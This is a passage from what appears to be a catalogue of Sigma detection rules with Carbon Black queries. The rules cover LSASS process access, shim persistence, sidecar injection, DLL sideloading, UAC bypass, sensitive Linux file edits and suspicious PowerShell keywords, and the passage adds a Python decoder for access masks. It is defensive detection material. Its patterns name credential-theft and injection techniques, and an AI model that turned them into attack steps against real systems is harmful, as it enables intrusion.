    - detection.threat-hunting
logsource:
    category: process_access
    product: windows
detection:
    selection:
        GrantedAccess:
            - '0x147a'
            - '0x1f3fff'
        CallTrace|contains: 'UNKNOWN'
    filter_main_wmiprvse:
        SourceImage: 'C:\Windows\System32\Wbem\Wmiprvse.exe'
        TargetImage: 'C:\Windows\system32\lsass.exe'
    filter_optional_dell_folders:
        # If dell software is installed we get matches like these
        # Example 1:
        #   SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
        #   TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
        #   GrantedAccess: 0x1F3FFF
        # Example 2:
        #   SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe
        #   TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
        #   GrantedAccess: 0x1F3FFF
        # Example 3:
        #   SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
        #   TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe
        #   GrantedAccess: 0x1F3FFF
        SourceImage|startswith:
            - 'C:\Program Files\Dell\'
            - 'C:\Program Files (x86)\Dell\'
        TargetImage|startswith:
            - 'C:\Program Files\Dell\'
            - 'C:\Program Files (x86)\Dell\'
    filter_optional_dell_specific:
        SourceImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe'
        TargetImage: 'C:\Windows\Explorer.EXE'
    filter_optional_visual_studio:
        SourceImage|startswith: 'C:\Program Files\Microsoft Visual Studio\'
        TargetImage|startswith: 'C:\Program Files\Microsoft Visual Studio\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium
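The GrantedAccess values this rule keys on (0x147a and 0x1f3fff) are bitmasks of Windows process access rights, and decoding them shows why the rule selects them: both carry PROCESS_VM_OPERATION, PROCESS_VM_WRITE and PROCESS_CREATE_THREAD, the rights a WriteProcessMemory plus CreateRemoteThread injection needs, whereas a handle opened only for query or read rights cannot inject. The following Python is an added example written for this page, not SigmaHQ or Carbon Black code: the right names and values are the documented Windows process access rights plus the generic standard rights, the injection heuristic and allow-list triage are the example's own (the allow pair reproduces the rule's filter_main_wmiprvse), and the events are constructed.

```python
"""Decode GrantedAccess masks from process_access events (added example).

Not SigmaHQ or Carbon Black code. Right names and values are the documented
Windows process access rights plus the generic standard rights; the injection
heuristic and allow-list triage are this example's own, not part of the rule.
"""

PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}

# Least a WriteProcessMemory + CreateRemoteThread injection chain needs.
INJECT_MIN = 0x0008 | 0x0020 | 0x0002


def parse_mask(text):
    """Sysmon/EDR telemetry carries the mask as hex text such as '0x147A'."""
    return int(str(text), 16)


def decode(mask):
    """Names of the rights set in mask, lowest bit first; undocumented bits as hex."""
    return [PROCESS_RIGHTS.get(1 << b, f"UNKNOWN_0x{1 << b:X}") for b in range(32) if mask & (1 << b)]


def can_inject(mask):
    """True when the handle carries every right the injection chain needs."""
    return mask & INJECT_MIN == INJECT_MIN


def triage(events, allow_pairs=()):
    """(source, target, rights) for injection-capable handles whose call trace is
    unresolved, minus source/target pairs on the allow list (case-insensitive)."""
    allowed = {(s.lower(), t.lower()) for s, t in allow_pairs}
    out = []
    for ev in events:
        mask = parse_mask(ev["GrantedAccess"])
        pair = (ev["SourceImage"].lower(), ev["TargetImage"].lower())
        unresolved = "unknown" in str(ev.get("CallTrace", "")).lower()
        if can_inject(mask) and unresolved and pair not in allowed:
            out.append((ev["SourceImage"], ev["TargetImage"], decode(mask)))
    return out


# Constructed sample events (not real telemetry; paths and call-trace offsets are made up).
EVENTS = [
    {"SourceImage": "C:\\Users\\u\\Downloads\\update.exe", "TargetImage": "C:\\Windows\\explorer.exe",
     "GrantedAccess": "0x147A", "CallTrace": "UNKNOWN(00000000)"},
    {"SourceImage": "C:\\Windows\\System32\\taskmgr.exe", "TargetImage": "C:\\Windows\\explorer.exe",
     "GrantedAccess": "0x1410", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4"},
    {"SourceImage": "C:\\Windows\\System32\\Wbem\\Wmiprvse.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe",
     "GrantedAccess": "0x1F3FFF", "CallTrace": "UNKNOWN(00000000)"},
    {"SourceImage": "C:\\Program Files\\Debugger\\dbg.exe", "TargetImage": "C:\\Windows\\explorer.exe",
     "GrantedAccess": "0x1F3FFF", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4"},
]
ALLOW = [("C:\\Windows\\System32\\Wbem\\Wmiprvse.exe", "C:\\Windows\\system32\\lsass.exe")]

if __name__ == "__main__":
    for src, dst, rights in triage(EVENTS, ALLOW):
        print(f"{src} -> {dst}: {', '.join(rights)}")
```

Only the first event survives triage: the taskmgr handle (0x1410) is query and read rights only, the Wmiprvse to lsass pair is on the allow list, and the debugger's trace resolves into ntdll rather than unbacked memory. Decoding each new source/target pair this way is a quicker route to the next filter_optional_* entry than reading raw masks.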
Level: medium · Quality: Moderate · Alert volume: Medium FP
Potential Shim Database Persistence via Sdbinst.EXE
Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
status: test · author: Markus Neis · ATT&CK mapping: sub-technique · id: 517490a7-115a-48c6-8862-1a481504d5a8
carbon_black query
((Image:\\sdbinst.exe OR OriginalFileName:sdbinst.exe) CommandLine:.sdb*) (-(ParentImage:\\msiexec.exe (CommandLine:\:\\Program\ Files\ \(x86\)\\IIS\ Express\\iisexpressshim.sdb* OR CommandLine:\:\\Program\ Files\\IIS\ Express\\iisexpressshim.sdb*)))
Sigma YAML
title: Potential Shim Database Persistence via Sdbinst.EXE
id: 517490a7-115a-48c6-8862-1a481504d5a8
related:
    - id: 18ee686c-38a3-4f65-9f44-48a077141f42
      type: similar
status: test
description: |
    Detects installation of a new shim using sdbinst.exe.
    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
references:
    - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence
author: Markus Neis
date: 2019-01-16
modified: 2023-12-06
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1546.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\sdbinst.exe'
        - OriginalFileName: 'sdbinst.exe'
    selection_cli:
        CommandLine|contains: '.sdb'
    filter_optional_iis:
        ParentImage|endswith: '\msiexec.exe'
        CommandLine|contains:
            # Expected behavior for IIS Express (e.g. https://www.hybrid-analysis.com/sample/15d4ff941f77f7bdfc9dfb2399b7b952a0a2c860976ef3e835998ff4796e5e91?environmentId=120)
            - ':\Program Files (x86)\IIS Express\iisexpressshim.sdb'
            - ':\Program Files\IIS Express\iisexpressshim.sdb'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium
medium Moderate Low FP
Potential Sidecar Injection Into Running Deployment
Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod that resides alongside the main container. One way to add containers to running resources like Deployments/DaemonSets/StatefulSets is via a "kubectl patch" operation. By injecting a new container into a legitimate pod, an attacker can run their code and hide their activity instead of running their own separate pod in the cluster.
status test author Leo Tsaousis (@laripping) ATT&CK technique id ad9012a6-e518-4432-9890-f3b82b8fc71f
carbon_black query
verb:patch apiGroup:apps "objectRef.resource":deployments
view Sigma YAML
title: Potential Sidecar Injection Into Running Deployment
id: ad9012a6-e518-4432-9890-f3b82b8fc71f
status: test
description: |
    Detects attempts to inject a sidecar container into a running deployment.
    A sidecar container is an additional container within a pod that resides alongside the main container.
    One way to add containers to running resources like Deployments/DaemonSets/StatefulSets is via a "kubectl patch" operation.
    By injecting a new container into a legitimate pod, an attacker can run their code and hide their activity instead of running their own separate pod in the cluster.
references:
    - https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch
    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
    - attack.t1609
    - attack.execution
logsource:
    category: application
    product: kubernetes
    service: audit
detection:
    selection:
        verb: 'patch'
        apiGroup: 'apps'
        objectRef.resource: 'deployments'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Potential SolidPDFCreator.DLL Sideloading
Detects potential DLL sideloading of "SolidPDFCreator.dll"
status test author X__Junior (Nextron Systems) ATT&CK sub-technique id a2edbce1-95c8-4291-8676-0d45146862b3
carbon_black query
ImageLoaded:\\SolidPDFCreator.dll (-(Image:\\SolidPDFCreator.exe (ImageLoaded:C\:\\Program\ Files\ \(x86\)\\SolidDocuments\\SolidPDFCreator\\* OR ImageLoaded:C\:\\Program\ Files\\SolidDocuments\\SolidPDFCreator\\*)))
view Sigma YAML
title: Potential SolidPDFCreator.DLL Sideloading
id: a2edbce1-95c8-4291-8676-0d45146862b3
status: test
description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
references:
    - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
author: X__Junior (Nextron Systems)
date: 2023-05-07
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\SolidPDFCreator.dll'
    filter_main_path:
        Image|endswith: '\SolidPDFCreator.exe'
        ImageLoaded|startswith:
            - 'C:\Program Files (x86)\SolidDocuments\SolidPDFCreator\'
            - 'C:\Program Files\SolidDocuments\SolidPDFCreator\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
Potential Suspicious Activity Using SeCEdit
Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy.
status test author Janantha Marasinghe ATT&CK sub-technique id c2c76b77-32be-4d1f-82c9-7e544bdfe0eb
carbon_black query
(Image:\\secedit.exe OR OriginalFileName:SeCEdit) ((CommandLine:\/export* CommandLine:\/cfg*) OR (CommandLine:\/configure* CommandLine:\/db*))
view Sigma YAML
title: Potential Suspicious Activity Using SeCEdit
id: c2c76b77-32be-4d1f-82c9-7e544bdfe0eb
status: test
description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy.
references:
    - https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit
author: Janantha Marasinghe
date: 2022-11-18
modified: 2022-12-30
tags:
    - attack.collection
    - attack.discovery
    - attack.persistence
    - attack.credential-access
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.defense-impairment
    - attack.t1685.001
    - attack.t1547.001
    - attack.t1505.005
    - attack.t1556.002
    - attack.t1685
    - attack.t1574.007
    - attack.t1564.002
    - attack.t1546.008
    - attack.t1546.007
    - attack.t1547.014
    - attack.t1547.010
    - attack.t1547.002
    - attack.t1557
    - attack.t1082
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\secedit.exe'
        - OriginalFileName: 'SeCEdit'
    selection_flags_discovery:
        CommandLine|contains|all:
            - '/export'
            - '/cfg'
    selection_flags_configure:
        CommandLine|contains|all:
            - '/configure'
            - '/db'
    # filter:
    #     SubjectUserName|endswith: '$'  SubjectUserName is from event ID 4719 in the Windows Security log
    condition: selection_img and (1 of selection_flags_*)
falsepositives:
    - Legitimate administrative use
level: medium
medium Strong Medium FP
Potential Suspicious Browser Launch From Document Reader Process
Detects when a browser process or browser tab is launched from an application that handles document files, such as Adobe or Microsoft Office applications, and connects to a web application over HTTP(S). This could indicate a possible phishing attempt.
status test author Joseph Kamau ATT&CK sub-technique id 1193d960-2369-499f-a158-7b50a31df682
carbon_black query
((ParentImage:Acrobat\ Reader* OR ParentImage:Microsoft\ Office* OR ParentImage:PDF\ Reader*) (Image:\\brave.exe OR Image:\\chrome.exe OR Image:\\firefox.exe OR Image:\\msedge.exe OR Image:\\opera.exe OR Image:\\maxthon.exe OR Image:\\seamonkey.exe OR Image:\\vivaldi.exe) CommandLine:http*) (-CommandLine:https\:\/\/go.microsoft.com\/fwlink\/*) (-(CommandLine:http\:\/\/ad.foxitsoftware.com\/adlog.php** OR CommandLine:https\:\/\/globe\-map.foxitservice.com\/go.php*do=redirect*))
view Sigma YAML
title: Potential Suspicious Browser Launch From Document Reader Process
id: 1193d960-2369-499f-a158-7b50a31df682
status: test
description: |
    Detects when a browser process or browser tab is launched from an application that handles document files, such as Adobe or Microsoft Office applications, and connects to a web application over HTTP(S). This could indicate a possible phishing attempt.
references:
    - https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/ # PDF Document
    - https://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/ # Office Document
author: Joseph Kamau
date: 2024-05-27
modified: 2025-10-07
tags:
    - attack.execution
    - attack.t1204.002
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        ParentImage|contains:
            - 'Acrobat Reader'
            - 'Microsoft Office'
            - 'PDF Reader'
        Image|endswith:
            - '\brave.exe'
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
            - '\opera.exe'
            - '\maxthon.exe'
            - '\seamonkey.exe'
            - '\vivaldi.exe'
        CommandLine|contains: 'http'
    filter_main_microsoft_help:
        CommandLine|contains: 'https://go.microsoft.com/fwlink/'
    filter_optional_foxit:
        CommandLine|contains:
            - 'http://ad.foxitsoftware.com/adlog.php?'
            - 'https://globe-map.foxitservice.com/go.php?do=redirect'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed.
level: medium
medium Strong Medium FP
Potential Suspicious Change To Sensitive/Critical Files
Detects changes to sensitive and critical files. Monitors files that you don't expect to change without planning on a Linux system. These files include, but are not limited to, system configuration files, authentication files, and critical application files. Attackers often target these files to maintain persistence, escalate privileges, or disrupt system operations.
status test author @d4ns4n_ (Wuerth-Phoenix) ATT&CK sub-technique id 86157017-c2b1-4d4a-8c33-93b8e67e4af4
carbon_black query
(((Image:\/cat OR Image:\/echo OR Image:\/grep OR Image:\/head OR Image:\/more OR Image:\/tail) CommandLine:>*) OR (Image:\/emacs OR Image:\/nano OR Image:\/sed OR Image:\/vi OR Image:\/vim)) (CommandLine:\/bin\/login* OR CommandLine:\/bin\/passwd* OR CommandLine:\/boot\/* OR CommandLine:\/etc\/*.conf* OR CommandLine:\/etc\/cron.* OR CommandLine:\/etc\/crontab* OR CommandLine:\/etc\/hosts* OR CommandLine:\/etc\/init.d* OR CommandLine:\/etc\/sudoers* OR CommandLine:\/opt\/bin\/* OR CommandLine:\/sbin* OR CommandLine:\/usr\/bin\/* OR CommandLine:\/usr\/local\/bin\/*) (-(Image:\/bin\/sed (CommandLine:sed\ \-i\ \/\^* OR CommandLine:sed\ \-ne\ s\/\^*) CommandLine:\/etc\/mdadm\/mdadm.conf))
view Sigma YAML
title: Potential Suspicious Change To Sensitive/Critical Files
id: 86157017-c2b1-4d4a-8c33-93b8e67e4af4
status: test
description: |
    Detects changes to sensitive and critical files. Monitors files that you don't expect to change without planning on a Linux system.
    These files include, but are not limited to, system configuration files, authentication files, and critical application files.
    Attackers often target these files to maintain persistence, escalate privileges, or disrupt system operations.
references:
    - https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor
author: '@d4ns4n_ (Wuerth-Phoenix)'
date: 2023-05-30
modified: 2026-03-18
tags:
    - attack.impact
    - attack.t1565.001
logsource:
    category: process_creation
    product: linux
detection:
    selection_img_1:
        Image|endswith:
            - '/cat'
            - '/echo'
            - '/grep'
            - '/head'
            - '/more'
            - '/tail'
        CommandLine|contains: '>'
    selection_img_2:
        Image|endswith:
            - '/emacs'
            - '/nano'
            - '/sed'
            - '/vi'
            - '/vim'
    selection_paths:
        CommandLine|contains:
            - '/bin/login'
            - '/bin/passwd'
            - '/boot/'
            - '/etc/*.conf'
            - '/etc/cron.' # Covers different cron config files "daily", "hourly", etc.
            - '/etc/crontab'
            - '/etc/hosts'
            - '/etc/init.d'
            - '/etc/sudoers'
            - '/opt/bin/'
            - '/sbin' # Covers: '/opt/sbin', '/usr/local/sbin/', '/usr/sbin/'
            - '/usr/bin/'
            - '/usr/local/bin/'
    filter_main_mdadm.conf:
        Image|endswith: '/bin/sed'
        CommandLine|startswith:
            - 'sed -i /^*'
            - 'sed -ne s/^'
        CommandLine|endswith: '/etc/mdadm/mdadm.conf'
    condition: 1 of selection_img_* and selection_paths and not 1 of filter_main_*
falsepositives:
    - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.
level: medium
medium Moderate High FP
Potential Suspicious PowerShell Keywords
Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
status test author Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup) ATT&CK sub-technique id 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf
carbon_black query
ScriptBlockText:System.Reflection.Assembly.Load\($* OR ScriptBlockText:\[System.Reflection.Assembly\]\:\:Load\($* OR ScriptBlockText:\[Reflection.Assembly\]\:\:Load\($* OR ScriptBlockText:System.Reflection.AssemblyName* OR ScriptBlockText:Reflection.Emit.AssemblyBuilderAccess* OR ScriptBlockText:Reflection.Emit.CustomAttributeBuilder* OR ScriptBlockText:Runtime.InteropServices.UnmanagedType* OR ScriptBlockText:Runtime.InteropServices.DllImportAttribute* OR ScriptBlockText:SuspendThread* OR ScriptBlockText:rundll32*
view Sigma YAML
title: Potential Suspicious PowerShell Keywords
id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf
status: test
description: Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
references:
    - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462
    - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1
    - https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1
    - https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7
author: Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)
date: 2019-02-11
modified: 2023-04-21
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - 'System.Reflection.Assembly.Load($'
            - '[System.Reflection.Assembly]::Load($'
            - '[Reflection.Assembly]::Load($'
            - 'System.Reflection.AssemblyName'
            - 'Reflection.Emit.AssemblyBuilderAccess'
            - 'Reflection.Emit.CustomAttributeBuilder'
            - 'Runtime.InteropServices.UnmanagedType'
            - 'Runtime.InteropServices.DllImportAttribute'
            - 'SuspendThread'
            - 'rundll32'
            # - 'FromBase64'
            # - 'Invoke-WMIMethod' # Prone to FP
            # - 'http://127.0.0.1' # Prone to FP
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Potential Suspicious PowerShell Module File Created
Detects the creation of a new PowerShell module in the first folder of the module directory structure, e.g. "\WindowsPowerShell\Modules\malware\malware.psm1". This is a somewhat uncommon practice, as legitimate modules often include a version folder.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id e8a52bbd-bced-459f-bd93-64db45ce7657
carbon_black query
TargetFilename:\\WindowsPowerShell\\Modules\\*\\.ps OR TargetFilename:\\WindowsPowerShell\\Modules\\*\\.dll
view Sigma YAML
title: Potential Suspicious PowerShell Module File Created
id: e8a52bbd-bced-459f-bd93-64db45ce7657
status: test
description: Detects the creation of a new PowerShell module in the first folder of the module directory structure, e.g. "\WindowsPowerShell\Modules\malware\malware.psm1". This is a somewhat uncommon practice, as legitimate modules often include a version folder.
references:
    - Internal Research
    - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-09
tags:
    - attack.persistence
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith:
            # Note: Don't include PowerShell 7 as it has default modules that don't follow this logic
            - '\\WindowsPowerShell\\Modules\\*\.ps'
            - '\\WindowsPowerShell\\Modules\\*\.dll'
    condition: selection
falsepositives:
    - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.
level: medium
medium Strong Medium FP
Potential Suspicious Registry File Imported Via Reg.EXE
Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
status test author frack113, Nasreddine Bencherchali ATT&CK technique id 62e0298b-e994-4189-bc87-bc699aa62d97
carbon_black query
(Image:\\reg.exe OR OriginalFileName:reg.exe) CommandLine:\ import\ * (CommandLine:C\:\\Users\\* OR CommandLine:%temp%* OR CommandLine:%tmp%* OR CommandLine:%appdata%* OR CommandLine:\\AppData\\Local\\Temp\\* OR CommandLine:C\:\\Windows\\Temp\\* OR CommandLine:C\:\\ProgramData\\*)
view Sigma YAML
title: Potential Suspicious Registry File Imported Via Reg.EXE
id: 62e0298b-e994-4189-bc87-bc699aa62d97
related:
    - id: 73bba97f-a82d-42ce-b315-9182e76c57b1
      type: derived
status: test
description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import
author: frack113, Nasreddine Bencherchali
date: 2022-08-01
modified: 2023-02-05
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\reg.exe'
        - OriginalFileName: 'reg.exe'
    selection_cli:
        CommandLine|contains: ' import '
    selection_paths:
        CommandLine|contains:
            - 'C:\Users\'
            - '%temp%'
            - '%tmp%'
            - '%appdata%'
            - '\AppData\Local\Temp\'
            - 'C:\Windows\Temp\'
            - 'C:\ProgramData\'
    condition: all of selection_*
falsepositives:
    - Legitimate import of keys
level: medium
medium Strong High FP
Potential Suspicious Windows Feature Enabled
Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
status test author frack113 ATT&CK tactic-only id 55c925c1-7195-426b-a136-a9396800e29b
carbon_black query
(ScriptBlockText:Enable\-WindowsOptionalFeature* ScriptBlockText:\-Online* ScriptBlockText:\-FeatureName*) (ScriptBlockText:TelnetServer* OR ScriptBlockText:Internet\-Explorer\-Optional\-amd64* OR ScriptBlockText:TFTP* OR ScriptBlockText:SMB1Protocol* OR ScriptBlockText:Client\-ProjFS* OR ScriptBlockText:Microsoft\-Windows\-Subsystem\-Linux*)
view Sigma YAML
title: Potential Suspicious Windows Feature Enabled
id: 55c925c1-7195-426b-a136-a9396800e29b
related:
    - id: c740d4cf-a1e9-41de-bb16-8a46a4f57918
      type: similar
status: test
description: |
    Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
references:
    - https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps
    - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system
    - https://learn.microsoft.com/en-us/windows/wsl/install-on-server
author: frack113
date: 2022-09-10
modified: 2022-12-29
tags:
    - attack.stealth
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection_cmd:
        ScriptBlockText|contains|all:
            - 'Enable-WindowsOptionalFeature'
            - '-Online'
            - '-FeatureName'
    selection_feature:
        # Add any insecure/unusual windows features to your env
        ScriptBlockText|contains:
            - 'TelnetServer'
            - 'Internet-Explorer-Optional-amd64'
            - 'TFTP'
            - 'SMB1Protocol'
            - 'Client-ProjFS'
            - 'Microsoft-Windows-Subsystem-Linux'
    condition: all of selection_*
falsepositives:
    - Legitimate usage of the features listed in the rule.
level: medium
medium Strong High FP
Potential Suspicious Windows Feature Enabled - ProcCreation
Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id c740d4cf-a1e9-41de-bb16-8a46a4f57918
carbon_black query
(CommandLine:Enable\-WindowsOptionalFeature* CommandLine:\-Online* CommandLine:\-FeatureName*) (CommandLine:TelnetServer* OR CommandLine:Internet\-Explorer\-Optional\-amd64* OR CommandLine:TFTP* OR CommandLine:SMB1Protocol* OR CommandLine:Client\-ProjFS* OR CommandLine:Microsoft\-Windows\-Subsystem\-Linux*)
view Sigma YAML
title: Potential Suspicious Windows Feature Enabled - ProcCreation
id: c740d4cf-a1e9-41de-bb16-8a46a4f57918
related:
    - id: 55c925c1-7195-426b-a136-a9396800e29b
      type: similar
status: test
description: |
    Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
references:
    - https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps
    - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system
    - https://learn.microsoft.com/en-us/windows/wsl/install-on-server
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-29
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection_cmd:
        CommandLine|contains|all:
            - 'Enable-WindowsOptionalFeature'
            - '-Online'
            - '-FeatureName'
    selection_feature:
        # Add any insecure/unusual windows features that you don't use in your environment
        CommandLine|contains:
            - 'TelnetServer'
            - 'Internet-Explorer-Optional-amd64'
            - 'TFTP'
            - 'SMB1Protocol'
            - 'Client-ProjFS'
            - 'Microsoft-Windows-Subsystem-Linux'
    condition: all of selection_*
falsepositives:
    - Legitimate usage of the features listed in the rule.
level: medium
medium Moderate Medium FP
Potential UAC Bypass Via Sdclt.EXE
A general detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used in UAC bypass techniques.
status test author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) ATT&CK sub-technique id 40f9af16-589d-4984-b78d-8c2aec023197
carbon_black query
Image:sdclt.exe (IntegrityLevel:High OR IntegrityLevel:S\-1\-16\-12288)
view Sigma YAML
title: Potential UAC Bypass Via Sdclt.EXE
id: 40f9af16-589d-4984-b78d-8c2aec023197
status: test
description: A general detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used in UAC bypass techniques.
references:
    - https://github.com/OTRF/detection-hackathon-apt29/issues/6
    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2024-12-01
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: 'sdclt.exe'
        IntegrityLevel:
            - 'High'
            - 'S-1-16-12288' # High
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock
Detects the use of the "Get-ADComputer" cmdlet in order to identify systems which are configured for unconstrained delegation.
status experimental author frack113 ATT&CK sub-technique id cdfa73b6-3c9d-4bb8-97f8-ddbd8921f5c5
carbon_black query
ScriptBlockText:\-Properties*TrustedForDelegation* OR ScriptBlockText:\-Properties*TrustedToAuthForDelegation* OR ScriptBlockText:\-Properties*msDS\-AllowedToDelegateTo* OR ScriptBlockText:\-Properties*PrincipalsAllowedToDelegateToAccount* OR ScriptBlockText:\-LDAPFilter*\(userAccountControl\:1.2.840.113556.1.4.803\:=524288\)*
view Sigma YAML
title: Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock
id: cdfa73b6-3c9d-4bb8-97f8-ddbd8921f5c5
status: experimental
description: Detects the use of the "Get-ADComputer" cmdlet in order to identify systems which are configured for unconstrained delegation.
references:
    - https://pentestlab.blog/2022/03/21/unconstrained-delegation/
    - https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer?view=windowsserver2022-ps
author: frack113
date: 2025-03-05
tags:
    - attack.reconnaissance
    - attack.discovery
    - attack.credential-access
    - attack.t1018
    - attack.t1558
    - attack.t1589.002
logsource:
    product: windows
    category: ps_script
